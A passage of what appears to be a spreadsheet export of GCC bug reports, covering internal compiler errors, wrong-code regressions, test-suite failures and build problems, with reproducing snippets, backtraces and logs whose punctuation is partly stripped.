PASS: gfortran.dg/integer_exponentiation_2.f90  -O2   (test for warnings line 149)
PASS: gfortran.dg/integer_exponentiation_2.f90  -O2   (test for warnings line 150)
PASS: gfortran.dg/integer_exponentiation_2.f90  -O2   (test for warnings line 151)
PASS: gfortran.dg/integer_exponentiation_2.f90  -O2  (test for excess errors)
Setting LD_LIBRARY_PATH to .:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/gcc:.:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/gcc
spawn [open ...]
Program aborted. Backtrace:
#0  0xC1239FEF
FAIL: gfortran.dg/integer_exponentiation_2.f90  -O2  execution test
Component is just a guess.
Test appears to fail on this test:
36        call check_equal_r (a**(-2.0) (1/a)*(1/a))
(gdb)
85          if (abs(a - b) &gt; 1.e-5 * abs(b)) call abort
(gdb)
95          if (a /= b) call abort
(gdb)
0x00002e08 in _gfortran_abort ()
    at ../../../gcc/libgfortran/intrinsics/abort.c:32
32      {
Introduced between 195125 and 195497.</t>
  </si>
  <si>
    <t>GCC-430</t>
  </si>
  <si>
    <t>gcc infinite loops</t>
  </si>
  <si>
    <t>When compiling lat_ops.c gcc goes into an infinite loop.  The command line I usually use is: gcc -c -O lat_ops.c.
It is consistent across all platforms to which I have access
(a wide variety of PC PowerPC HP-PA MIPS ...) and to
all versions of gcc I have tried at least as far back as 
2.7.0 and as recent as 2.95.2.  I have attached a tarball 
containing a text file with the output of 
      gcc -v --save-temps -O -DRUSAGE lat_ops.c
for three representative platforms as well as the three 
copies of lat_ops.i that were generated.
Release:
gcc-2.95.2 egcs-2.91.66 gcc-2.7.0 ...
Environment:
x86 Linux SPARC Linux HP-PARISC HP-UX x86 Freebsd PowerPC Linux MIPS IRIX ...
How-To-Repeat:
gcc -O lat_ops.c
(or since I have just given lat_ops.i gcc -c -O lat_ops.i)</t>
  </si>
  <si>
    <t>GCC-37891</t>
  </si>
  <si>
    <t>[graphite-branch] Invalid use of single_succ_edge in create_single_entry_edge</t>
  </si>
  <si>
    <t>Commit 141283 introduced new code in create_single_entry_edge that breaks polyhedron in linpk.f90 mdbx.f90 protein.f90 rnflow.f90 test_fpu.f90:
The code added was:
     {
+      edge e = single_succ_edge (region-&gt;entry)
+      int e_flags = e-&gt;flags
+      int b_flags = region-&gt;entry-&gt;flags
+      bool irreducible_e = e_flags 
+      bool irreducible_b = region-&gt;entry-&gt;flags 
       edge forwarder = split_block_after_labels (region-&gt;entry)
+
+      if (irreducible_e)
+       forwarder-&gt;flags = e_flags
+
+      if (irreducible_b)
+       forwarder-&gt;dest-&gt;flags = b_flags
+
       region-&gt;entry = forwarder-&gt;dest
It fails e.g. in:
linpk.f90: In function 'daxpy':
linpk.f90:290: internal compiler error: in single_succ_edge at basic-block.h:642</t>
  </si>
  <si>
    <t>grosser</t>
  </si>
  <si>
    <t>GCC-41467</t>
  </si>
  <si>
    <t>ICE in lto_symtab_prevailing_decl at lto-symtab.c:727 for 483.xalancbmk</t>
  </si>
  <si>
    <t>Due to a typo in lto-symtab.c.  I have a fix.</t>
  </si>
  <si>
    <t>GCC-31740</t>
  </si>
  <si>
    <t>[4.3 Regression] Problem while compiling gcc for mips-elf</t>
  </si>
  <si>
    <t>Hello
there seems to be a gcc problem with the target 'mips-elf':
gcc -c -DHAVE_CONFIG_H     -DPROFILE=1 -DWITH_PROFILE=-1   -DWITH_ALIGNMENT=NONSTRICT_ALIGNMENT -DWITH_TARGET_WORD_BITSIZE=32 -DWITH_TARGET_WORD_MSB=31 -DWITH_DEFAULT_TARGET_BYTE_ORDER=BIG_ENDIAN  -DWITH_FLOATING_POINT=HARD_FLOATING_POINT -DWITH_TARGET_FLOATING_POINT_BITSIZE=32 -DWITH_HW=0 -DWITH_HOST_BYTE_ORDER=LITTLE_ENDIAN    -DWITH_RESERVED_BITS=1  -DWITH_SMP=0  -w    -DMIPS_MACH_DEFAULT=bfd_mach_mips8000   -I. -I/n/07/mstein/combined-trunk/sim/mips -I../common -I/n/07/mstein/combined-trunk/sim/mips/../common -I../../include -I/n/07/mstein/combined-trunk/sim/mips/../..//include -I../../bfd -I/n/07/mstein/combined-trunk/sim/mips/../..//bfd -I../../opcodes -I/n/07/mstein/combined-trunk/sim/mips/../..//opcodes  -g -O2 /n/07/mstein/combined-trunk/sim/mips/mdmx.c
/n/07/mstein/combined-trunk/sim/mips/mdmx.c: In function 'MsgnQH':
/n/07/mstein/combined-trunk/sim/mips/mdmx.c:247: internal compiler error: in set_value_range at tree-vrp.c:278
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [mdmx.o] Error 1
The SVN revision was 124242.</t>
  </si>
  <si>
    <t>GCC-21116</t>
  </si>
  <si>
    <t>[4.1 Regression] tree-ssa-phiopt.c:193 has wrong translation from EDGE_COUNT to single_succ_p.</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/cgi-bin/cvsweb.cgi/gcc/gcc/tree-ssa-phiopt.c.diff?r1=2.25&amp;r2=2.26&amp;only_with_tag=MAIN
-      if (EDGE_COUNT (bb1-&gt;succs) &gt; 1
+      if (!single_succ_p (bb1) &gt; 1
We don't need &gt; 1.</t>
  </si>
  <si>
    <t>GCC-20822</t>
  </si>
  <si>
    <t>makeinfo cannot process gnat_ugn_unw.texi</t>
  </si>
  <si>
    <t>when bootstrapping on Windows (mingw/msys) the documentation is not generated.  
Makeinfo stops with the complaint:
$ cat -v make.err 
doc/gnat_ugn_unw.texi:92: Unknown index `fn' and/or `cp^M' in @synindex.
./doc/gnat_ugn_unw.texi:11211: Cross reference to nonexistent node 
`Alternative^M File Naming Schemes'.
See the CR characters after cp and after Alternative.
I suppose it is a similar problem as the ones that get fixed by http://gcc.gnu.
org/ml/gcc-patches/2005-03/msg02615.html
a simple workaround for finishing bootstrap is to use make -k and simply do 
without the doc.</t>
  </si>
  <si>
    <t>GCC-21155</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in ssa tree check compiling crafty with -ftree-vectorize -maltivec</t>
  </si>
  <si>
    <t>GCC mainline gets an ICE compiling crafty from SPEC CPU2000 on
powerpc64-linux:
elm3b149% /home/janis/tools/gcc-mline-20050421/bin/gcc -m64 -O2 -ftree-vectorize
-maltivec -c crafty_bug.c
crafty_bug.c: In function â€˜mainâ€™:
crafty_bug.c:31: internal compiler error: tree check: expected ssa_name have
var_decl in ssa_mark_def_sites at tree-into-ssa.c:3055
The test case extracted from crafty's main.c is still pretty big
but taking out anything else made it work.  I tried it on another
system where it got a segfault instead and some small changes caused
segfaults with the compiler which I was reducing it.
I first see the ICE with this patch from law but it might merely be
a latent bug particularly since the test case is so touchy:
   http://gcc.gnu.org/ml/gcc-cvs/2005-04/msg00808.html</t>
  </si>
  <si>
    <t>GCC-61729</t>
  </si>
  <si>
    <t>FAIL: g++.dg/abi/scoped1.C  -std=gnu++11 execution test</t>
  </si>
  <si>
    <t>This fails only for -m32 not for -m64.
$ gcc/xg++ -Bgcc/ ../gcc/testsuite/g++.dg/abi/scoped1.C -nostdinc++ -Ipowerpc64-linux/32/libstdc++-v3/include/powerpc64-linux -Ipowerpc64-linux/32/libstdc++-v3/include -I../libstdc++-v3/libsupc++ -I../libstdc++-v3/include/backward -I../libstdc++-v3/testsuite/util -std=gnu++11 -fabi-version=0 -Wabi=2 -Lpowerpc64-linux/32/libstdc++-v3/src/.libs -Bpowerpc64-linux/32/libstdc++-v3/src/.libs -Lpowerpc64-linux/32/libstdc++-v3/src/.libs -lm -m32 -o ./scoped1.exe -g
../gcc/testsuite/g++.dg/abi/scoped1.C: In function â€˜int main()â€™:
../gcc/testsuite/g++.dg/abi/scoped1.C:22:69: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
   f(9 A::a1 A::a2 A::a3 A::a1 A::a2 A::a3 A::a1 A::a2 A::a3) // { dg-warning passed }
                                                                     ^
../gcc/testsuite/g++.dg/abi/scoped1.C:22:69: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
../gcc/testsuite/g++.dg/abi/scoped1.C:22:69: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
../gcc/testsuite/g++.dg/abi/scoped1.C:22:69: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
../gcc/testsuite/g++.dg/abi/scoped1.C:22:69: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
../gcc/testsuite/g++.dg/abi/scoped1.C:22:69: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
../gcc/testsuite/g++.dg/abi/scoped1.C:22:69: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
../gcc/testsuite/g++.dg/abi/scoped1.C:22:69: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
../gcc/testsuite/g++.dg/abi/scoped1.C:22:69: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
../gcc/testsuite/g++.dg/abi/scoped1.C: In function â€˜void f(int ...)â€™:
../gcc/testsuite/g++.dg/abi/scoped1.C:9:29: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
   if (__builtin_va_arg (ap A) != A::a1) __builtin_abort() // { dg-warning passed }
                             ^
../gcc/testsuite/g++.dg/abi/scoped1.C:10:29: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
   if (__builtin_va_arg (ap A) != A::a2) __builtin_abort() // { dg-warning passed }
                             ^
../gcc/testsuite/g++.dg/abi/scoped1.C:11:29: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
   if (__builtin_va_arg (ap A) != A::a3) __builtin_abort() // { dg-warning passed }
                             ^
../gcc/testsuite/g++.dg/abi/scoped1.C:12:29: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
   if (__builtin_va_arg (ap A) != A::a1) __builtin_abort() // { dg-warning passed }
                             ^
../gcc/testsuite/g++.dg/abi/scoped1.C:13:29: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
   if (__builtin_va_arg (ap A) != A::a2) __builtin_abort() // { dg-warning passed }
                             ^
../gcc/testsuite/g++.dg/abi/scoped1.C:14:29: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
   if (__builtin_va_arg (ap A) != A::a3) __builtin_abort() // { dg-warning passed }
                             ^
../gcc/testsuite/g++.dg/abi/scoped1.C:15:29: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
   if (__builtin_va_arg (ap A) != A::a1) __builtin_abort() // { dg-warning passed }
                             ^
../gcc/testsuite/g++.dg/abi/scoped1.C:16:29: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
   if (__builtin_va_arg (ap A) != A::a2) __builtin_abort() // { dg-warning passed }
                             ^
../gcc/testsuite/g++.dg/abi/scoped1.C:17:29: warning: scoped enum â€˜Aâ€™ passed through ... as â€˜intâ€™ before -fabi-version=6 â€˜short intâ€™ after [-Wabi]
   if (__builtin_va_arg (ap A) != A::a3) __builtin_abort() // { dg-warning passed }
                             ^
(gdb) bt
#0  0x0fc1fe74 in __GI_raise (sig=sig@entry=6)
    at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x0fc217f8 in __GI_abort () at abort.c:89
#2  0x10000648 in f (i=9) at ../gcc/testsuite/g++.dg/abi/scoped1.C:10
#3  0x10000980 in main () at ../gcc/testsuite/g++.dg/abi/scoped1.C:22
(gdb) f 2
#2  0x10000648 in f (i=9) at ../gcc/testsuite/g++.dg/abi/scoped1.C:10
10        if (__builtin_va_arg (ap A) != A::a2) __builtin_abort() // { dg-warning passed }</t>
  </si>
  <si>
    <t>GCC-28346</t>
  </si>
  <si>
    <t>[4.0 regression] ICE creating pointer-to-reference-member</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.0.0:
=========================================
template struct A
{
    int
    A()
    ~A() {  }
}
A a
=========================================
bug.cc: In destructor 'A &gt;::~A() [with int  = 0]':
bug.cc:9:   instantiated from here
bug.cc:6: internal compiler error: in gimplify_expr at gimplify.c:5763
Please submit a full bug report [etc.]
Before we got the error message:
bug.cc: In destructor `void A &gt;::A() [with int  = 0]':
bug.cc:9:   instantiated from here
bug.cc:6: cannot create pointer to reference member `A::i'</t>
  </si>
  <si>
    <t>GCC-31361</t>
  </si>
  <si>
    <t>SSE2 generation bug with shifts</t>
  </si>
  <si>
    <t>Following code results in output 0 0 0 0 with -O1 and higher. -O0 is OK and gives output ff ff ff ff. gcc-3.4.6 produces correct output even with -O3.</t>
  </si>
  <si>
    <t>GCC-58702</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE with undeclared variable in OpenMP reduction clause</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -fopenmp) triggers an ICE on trunk:
=============================================
void foo()
{
  x
#pragma omp parallel for reduction(+:x)
  for (int i = 0 i &lt; 10 ++i) 
}
=============================================
bug.cc: In function 'void foo()':
bug.cc:3:3: error: 'x' was not declared in this scope
   x
   ^
bug.cc:4:40: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in finish_omp_reduction_clause at cp/semantics.c:4966
 #pragma omp parallel for reduction(+:x)
                                        ^
0xd14f79 tree_class_check_failed(tree_node const* tree_code_class char const* int char const*)
        ../../gcc/gcc/tree.c:9351
0x6df624 tree_class_check
        ../../gcc/gcc/tree.h:2797
0x6df624 finish_omp_reduction_clause
        ../../gcc/gcc/cp/semantics.c:4966
0x6df624 finish_omp_clauses(tree_node*)
        ../../gcc/gcc/cp/semantics.c:5709
0x634b1e cp_omp_split_clauses
        ../../gcc/gcc/cp/parser.c:28967
0x66873e cp_parser_omp_for
        ../../gcc/gcc/cp/parser.c:29079
0x668c4b cp_parser_omp_parallel
        ../../gcc/gcc/cp/parser.c:29259
0x63f221 cp_parser_omp_construct
        ../../gcc/gcc/cp/parser.c:30380
0x63f221 cp_parser_pragma
        ../../gcc/gcc/cp/parser.c:30885
0x64555c cp_parser_statement
        ../../gcc/gcc/cp/parser.c:9297
0x646342 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:9604
0x646486 cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:9558
0x659b0b cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:18401
0x659b0b cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:18437
0x65df0f cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:22444
0x65ece2 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:22365
0x65ece2 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16412
0x65ff2f cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11047
0x643860 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10928
0x66aaae cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10825
Please submit a full bug report [etc.]
The regression was introduced between 2013-10-09 and 2013-10-11.</t>
  </si>
  <si>
    <t>GCC-59251</t>
  </si>
  <si>
    <t>wrong code generation with allocatable dummy argument and INTENT(OUT)</t>
  </si>
  <si>
    <t>Using the following program:
module branch_plot_results_mod
  implicit none
  type public :: system_variable_type
     sequence
     integer :: index = -1
  end type system_variable_type
  type branch_plot_results_type
     sequence
     integer                                 :: iu_appv = 0
     type(system_variable_type) allocatable :: system_variables(:)
  end type branch_plot_results_type
contains
  subroutine  make1 ( res)
    type(branch_plot_results_type) allocatable intent(out) :: res ! intent(out) causes wrong code generation
  end subroutine make1
end module branch_plot_results_mod
program testy
  use branch_plot_results_mod
  type(branch_plot_results_type) allocatable :: res1
  call make1(res1)
end program testy
gfortran 4.8.2 on Linux x86_64 produces an executable that crashes due to a memory corruption.
valgrind reports:
==24704== Invalid free() / delete / delete[] / realloc()
==24704==    at 0x4A071A4: free (vg_replace_malloc.c:468)
==24704==    by 0x401B25: __branch_plot_results_mod_MOD_make1 (b1.f90:16)
==24704==    by 0x401BA3: MAIN__ (b1.f90:24)
==24704==    by 0x401C21: main (b1.f90:22)
==24704==  Address 0xffefffaa0 is on thread 1's stack
This is related to the use of the INTENT(OUT). This report is a possible duplicate of PR56218 although the program above does not use any OOP feature.</t>
  </si>
  <si>
    <t>GCC-32960</t>
  </si>
  <si>
    <t>no warning for conflicting attributes on separate decls</t>
  </si>
  <si>
    <t>Compile this:
extern void f(void)
extern void g(void) __attribute__ ((hot)) __attribute__((cold))
extern void f(void) __attribute__ ((hot))
extern void f(void) __attribute__ ((cold))
I see a warning for the conflicting attributes on 'g' but not
for 'f'.  The problem here is that the attribute handler is not
called for the smashed decl only for the one currently being
constructed.</t>
  </si>
  <si>
    <t>GCC-66187</t>
  </si>
  <si>
    <t>[6 Regression] wrong code at -O1 -O2 and -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The current gcc trunk miscompiles the following code on x86_64-linux at -O1 -O2 and -O3 in both 32-bit and 64-bit modes. 
This is a regression from 5.1.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20150517 (experimental) [trunk revision 223265] (GCC) 
$ 
$ gcc-trunk -O0 small.c ./a.out
$ gcc-trunk -Os small.c ./a.out
$ gcc-5.1 -O1 small.c ./a.out
$ 
$ gcc-trunk -O1 small.c
$ ./a.out
Aborted (core dumped)
$ 
---------------------------------
struct
{
  short f1
} b
int a = 1 e = -1
short f
int
main ()
{
  int g
  f = e
  g = b.f1 &lt; 0 ? 0 : f + b.f1
  if ((g &amp; -4) &lt; 0)
    a = 0
  if (a)
    __builtin_abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-82855</t>
  </si>
  <si>
    <t>AVX512: replace OP+movemask with OP_mask+ktest</t>
  </si>
  <si>
    <t>Before AVX512 AVX/SSE code was written as in test1 function below: some operation(s) created mask in vector register it was then converted to int with movemask instruction and resulting int value was used in another expression - e.g. compared with some constant. AVX512 added new k1..k7 registers and set of instructions with _mask suffix which writes to them instead of creating mask in vector register. So test2 function is simple attempt to rewrite test1 with new instructions:
#include immintrin.h
bool test1(void* ptr)
{
  __m256i v = _mm256_loadu_si256((const __m256i*)ptr)
  v = _mm256_cmpeq_epi32(v _mm256_setzero_si256())
  return 0 == _mm256_movemask_epi8(v)
}
bool test2(void* ptr)
{
  __m256i v = _mm256_loadu_si256((const __m256i*)ptr)
  __mmask8 m = _mm256_cmpeq_epi32_mask(v _mm256_setzero_si256())
  return 0 == m
}
I have tried to compile this using Compiler Explorer at https://godbolt.org/ with with following options:
-O3 -mavx -ftree-vectorize -mbmi -mpopcnt -mbmi2 -mavx2 -mavx512f -mavx512cd -mavx512vl -mavx512bw -mavx512dq
gcc 7.2 and gcc trunk created following code:
test1(void*):
  vmovdqu8 xmm0 XMMWORD PTR [rdi]
  vinserti128 ymm1 ymm0 XMMWORD PTR [rdi+16] 0x1
  vpxord xmm0 xmm0 xmm0
  vpcmpeqd ymm0 ymm0 ymm1
  vpmovmskb eax ymm0
  test eax eax
  sete al
  ret
test2(void*):
  vmovdqu8 xmm0 XMMWORD PTR [rdi]
  vpxord xmm1 xmm1 xmm1
  vinserti128 ymm0 ymm0 XMMWORD PTR [rdi+16] 0x1
  vpcmpeqd k1 ymm0 ymm1
  kmovb eax k1
  test al al
  sete al
  ret
clang 5.0.0 created this:
test1(void*): # @test1(void*)
  vpxor ymm0 ymm0 ymm0
  vpcmpeqd k0 ymm0 ymmword ptr [rdi]
  vpmovm2d ymm0 k0
  vpmovmskb eax ymm0
  test eax eax
  sete al
  vzeroupper
  ret
test2(void*): # @test2(void*)
  vpxor ymm0 ymm0 ymm0
  vpcmpeqd k0 ymm0 ymmword ptr [rdi]
  ktestb k0 k0
  sete al
  vzeroupper
  ret
gcc output does not look very optimal. clang output for test2 is better it uses ktestb instead of kmovb+test. gcc should be able to do this too.
There is also one more possible optimization which can be applied for test1: automatically replace OP and movemask instruction pair with OP_mask instruction. Something like this is already performed for FMA3 gcc is able to replace mul/add instruction pair with one FMA instruction. I do not have access to any machine with AVX512 so I cannot perform any benchmarks. However this kind of optimization looks promising so it is worth exploring.</t>
  </si>
  <si>
    <t>GCC-2587</t>
  </si>
  <si>
    <t>ICE#73: Internal compiler error in process_overload_item at ../gcc/cp/method.c:1460</t>
  </si>
  <si>
    <t>make: *** [tstring.o] Error 1
g++ -c -O2 -DLINUX=2    tstring.cpp
tfirst.h: In method `tString::tString (char * long int)':
tfirst.h:131: Internal error #73.
tfirst.h:131: Internal compiler error in process_overload_item at
../gcc/cp/method.c:1460
Please submit a full bug report.
See  for instructions.
Release:
version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
Fairly standard hardware (Duron 800) ?  Stock install of 7.0 from downloaded ISO's
How-To-Repeat:
unzip the file somwhere.  run the mm script.  see the error.
view the tbuggytemplate.h file for more instructions.
APOLOGIES FOR DUPLICATE SUBMISSION.
There was a (very) lame typo-bug in my test function.  It has no bearing on the presence or absence of the problem with the ICE for the templates but I figured I'd fix it and resubmit it before someone said oh you just have a  in a bad place and ignored this problem.</t>
  </si>
  <si>
    <t>mig</t>
  </si>
  <si>
    <t>GCC-44276</t>
  </si>
  <si>
    <t>[4.6 Regression]: gcc.dg/tls/alias-1.c</t>
  </si>
  <si>
    <t>With revision 159779 this test passed.
From revision 159784 and on this test has failed as follows:
Running /tmp/hpautotest-gcc1/gcc/gcc/testsuite/gcc.dg/tls/tls.exp ...
FAIL: gcc.dg/tls/alias-1.c (test for excess errors)
With the message in the logfile being (copy-pasted):
Executing on host: /tmp/hpautotest-gcc1/cris-elf/gccobj/gcc/xgcc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/gcc/ /tmp/hpaut\
otest-gcc1/gcc/gcc/testsuite/gcc.dg/tls/alias-1.c    -ansi -pedantic-errors   -isystem /tmp/hpautotest-gcc1/cris-elf/gc\
cobj/cris-elf/./newlib/targ-include -isystem /tmp/hpautotest-gcc1/gcc/newlib/libc/include -B/tmp/hpautotest-gcc1/cris-e\
lf/gccobj/cris-elf/./libgloss/cris/ -L/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/./libgloss/cris -L/tmp/hpautotest-g\
cc1/gcc/libgloss/cris  -B/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/./newlib/ -L/tmp/hpautotest-gcc1/cris-elf/gccobj\
/cris-elf/./newlib -sim3  -lm   -o alias-1.exe    (timeout = 300)
/tmp/ccZoLZBR.s: Assembler messages:^M
/tmp/ccZoLZBR.s:43: Error: symbol `___emutls_v.bar' is already defined^M
compiler exited with status 1
output is:
/tmp/ccZoLZBR.s: Assembler messages:^M
/tmp/ccZoLZBR.s:43: Error: symbol `___emutls_v.bar' is already defined^M
FAIL: gcc.dg/tls/alias-1.c (test for excess errors)
Excess errors:
/tmp/ccZoLZBR.s:43: Error: symbol `___emutls_v.bar' is already defined
Author of suspect patches in revision range CC:ed.</t>
  </si>
  <si>
    <t>GCC-59837</t>
  </si>
  <si>
    <t>[ARM] ICE when building linux-linaro-tracking</t>
  </si>
  <si>
    <t>Created attachment 31849
testcase
arm-linux-gnueabi-gcc neon.c -Os -fno-omit-frame-pointer -mapcs -mabi=aapcs-linux -mfloat-abi=softfp -mfpu=neon -g -S -marm
neon.c: In function â€˜raid6_neon4_gen_syndrome_realâ€™:
neon.c:79:1: internal compiler error: in dwarf2out_frame_debug_adjust_cfa at dwarf2cfi.c:1090
Root cause:
When expanding epilogue REG_CFA_ADJUST_CFA NOTE is added to handle dwarf info issue for shrink-wrap. But for TARGET_APCS_FRAME shrink-wrap is disabled. And not all dwarf info in arm_expand_epilogue_apcs_frame are correctly updated.
arm_emit_vfp_multi_reg_pop is called by both arm_expand_epilogue_apcs_frame and arm_expand_epilogue. So we should not add the NOTE in arm_emit_vfp_multi_reg_pop if shrink-wrap is not enabled.</t>
  </si>
  <si>
    <t>GCC-3657</t>
  </si>
  <si>
    <t>Documentation bug re Problems with floating point computation</t>
  </si>
  <si>
    <t>This web page:
http://www.gnu.org/software/gcc/bugs.html
shows this example code fragment:
  double min = 0.0
  double max = 0.5
  double width = 0.01
  std::cout &lt;&lt; (int)(((max - min) / width) - 1) &lt;&lt; std::endl
and asserts that it might print 50 on some systems
and optimization levels and 51 on others.
I assert that it is only reasonable that this code
would be expected to print 49 or 48.
I know this is a bit picky since the main point
of the example is to show that finite representation
of real numbers has limitations and to be aware
of rounding issues.  However it is easy to correct
the comment.
Release:
n/a
Environment:
n/a
How-To-Repeat:
Compile and run the example on a few systems
and at different optimization levels.  The
results should be 49 or 48.</t>
  </si>
  <si>
    <t>GCC-24136</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE with some fortran code</t>
  </si>
  <si>
    <t>Take the following fortran code:
      subroutine  electra(rotyeeepese
     a                   eereetperpetsersetkeyps)
      implicit real*8 (a-ho-z)
      common  /nunu/  nudnudrdnudbetadetadnunup
      data facenfacprfacsrg /2.037300d+241.358200d+241.686304d-10
     18.314339d+07/
      data a1a2a3a4 /2.059815d-03-7.027778d-03
     14.219747d-02-1.132427d+00/
      beta=facs*t
      b32=b12*beta
      u=(f62/f52)**2
      dudnu=2.0d0*u*(df62/f62-df52/f52)
      x=beta*u
      f=1.0d0+x*(2.5d0+x*(2.0d0+0.5d0*x))
      df=2.5d0+x*(4.0d0+1.5d0*x)
      dfdb=u*df
      fi32=f32+(f-1.0d0)*f52/u
      dfidnu=dfidu*dudnu+df32+(f-1.0d0)*df52/u
      dfidb=dfdb*f52/u
      dfidbet=dfidb+dfidnu*dnudb
      gs=sqrt(g)
      dg=0.75d0*gs
      dgdb=u*dg
      dgdu=beta*dg
      gi32=f32+(g-1.0d0)*f52/u
      dgidu=(u*dgdu-g+1.0d0)*f52/us
      dgidnu=dgidu*dudnu+df32+(g-1.0d0)*df52/u
      dgidb=dgdb*f52/u
      dgidbet=dgidb+dgidnu*dnudb
      dgidroe=dgidnu*dnudr
      em=facen*b52*fi32
      demdbet=facen*b32*(2.5d0*fi32+beta*dfidbet)
      dpmdbet=facpr*b32*(2.5d0*gi32+beta*dgidbet)
      demdroe=facen*b52*dfidroe
      dpmdroe=facpr*b52*dgidroe
      call  divine(nupfp12dfp12s12)
      s42=2.0d0
      call  divine(nupfp42dfp42s42)
      eer=(ye*(demdroe+depdroe)-(em+ep)/ro)/ro
      eet=facs*(demdbet+depdbet)/ro
      per=ye*(dpmdroe+dppdroe)
      pet=facs*(dpmdbet+dppdbet)
      end
-------
At -O2 and above we get an ICE:
t1.f:42: error: insn does not satisfy its constraints:
(insn 257 256 131 0 (set (reg:DF 9 r9)
        (mem/u/c/i:DF (lo_sum:SI (reg:SI 10 r10)
                (symbol_ref/u:SI (*LC3) [flags 0x2])) [3 S8 A64])) 1 {movdf_low_si} (nil)
    (nil))</t>
  </si>
  <si>
    <t>GCC-34544</t>
  </si>
  <si>
    <t>pthread_default_stacksize_np failed.</t>
  </si>
  <si>
    <t>make[4]: Entering directory `/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/boehm-gc
'
pthread_default_stacksize_np failed.
/bin/sh[9]: 407 Bus error(coredump)
FAIL: gctest
I believe that the fail is expected.</t>
  </si>
  <si>
    <t>GCC-15178</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] Solaris 9/x86 fails linking after stage 3</t>
  </si>
  <si>
    <t>mkdir .libs/libstdc++.lax/libsupc++convenience.a
(cd .libs/libstdc++.lax/libsupc++convenience.a &amp;&amp; ar x
/home/doehrm/gcc-3.4.0/compile/i386-p
c-solaris2.9/libstdc++-v3/src/../libsupc++/.libs/libsupc++convenience.a)
/home/doehrm/gcc-3.4.0/compile/gcc/xgcc -shared-libgcc
-B/home/doehrm/gcc-3.4.0/compile/gcc/
 -nostdinc++
